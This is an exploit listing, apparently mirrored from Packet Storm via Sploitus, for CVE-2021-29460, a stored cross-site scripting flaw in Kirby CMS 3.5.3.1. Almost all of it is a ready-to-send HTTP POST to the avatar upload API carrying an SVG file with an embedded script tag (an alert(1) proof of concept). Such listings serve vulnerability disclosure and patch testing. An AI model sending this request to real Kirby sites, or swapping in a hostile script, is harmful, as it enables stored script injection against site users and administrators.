Exploit for Kirby CMS 3.5.3.1 Cross Site Scripting CVE-2021-29460

Name: Exploit for Kirby CMS 3.5.3.1 Cross Site Scripting CVE-2021-29460
Rating: 5 (416 reviews)

2021-04-28 | CVSS -0.2

## https://sploitus.com/exploit?id=PACKETSTORM:162359
# Exploit Title: Kirby CMS 3.5.3.1 - 'file' Cross-Site Scripting (XSS)  
# Date: 21-04-2021  
# Exploit Author: Sreenath Raghunathan  
# Vendor Homepage: https://getkirby.com/  
# Software Link: https://github.com/getkirby/kirby  
# Version: 3.5.3.1(REQUIRED)  
# CVE : CVE-2021-29460  
  
POST /api/users/<userid>/avatar HTTP/1.1  
Host: <host>  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:87.0)  
Gecko/20100101 Firefox/87.0  
Accept: */*  
Accept-Language: en-US,en;q=0.5  
Accept-Encoding: gzip, deflate  
X-CSRF: <redacted>  
Content-Type: multipart/form-data;  
boundary=---------------------------286121627839893676321700902916  
Content-Length: 563  
  
Connection: close  
Cookie:  
<redacted>  
  
  
  
-----------------------------286121627839893676321700902916  
Content-Disposition: form-data; name="file"; filename="svgxss.svg"  
Content-Type: image/svg+xml  
  
<?xml version="1.0" standalone="no"?>  
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN"  
"http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">  
  
<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">  
<polygon id="triangle" points="0,0 0,500 500,0" fill="#009900"  
stroke="#004400"/>  
"><script>alert(1)</script>  
</svg>  
-----------------------------286121627839893676321700902916--